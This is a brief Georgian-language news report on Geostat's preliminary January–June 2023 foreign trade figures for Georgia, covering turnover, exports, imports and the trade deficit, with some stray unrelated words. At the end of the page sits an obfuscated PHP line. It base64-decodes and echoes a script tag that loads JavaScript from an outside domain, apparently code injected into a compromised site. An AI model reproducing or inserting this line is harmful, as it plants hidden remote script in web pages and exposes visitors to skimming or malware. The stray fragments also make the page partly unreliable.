celsiusi
ავერსი შნაიდერი

სტატისტიკის ეროვნული სამსახურის წინასწარი მონაცემებით, 2023 წლის იანვარ-ივნისში საქართველოში საქონლით საგარეო სავაჭრო ბრუნვამ (არადეკლარირებული ვაჭრობის გარეშე) 10 266.2 მლნ. აშშ დოლარი შეადგინა, რაც წინა წლის შესაბამის მაჩვენებელზე 20.1 პროცენტით მეტია.

საქსტატის ცნობით, ექსპორტი 3 050.4 მლნ. აშშ დოლარი იყო, ანუ გაიზარდა 19.2 პროცენტით, ხოლო იმპორტი – 7 215.8 მლნ. აშშ დოლარი. ზრდამ 20.4 პროცენტი შეადგინა.

უარყოფითმა სავაჭრო ბალანსმა კი 2023 წლის იანვარ-ივნისში 4 165.4 მლნ. აშშ დოლარი შეადგინა, რაც საგარეო სავაჭრო ბრუნვის 40.6 პროცენტია.

424
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");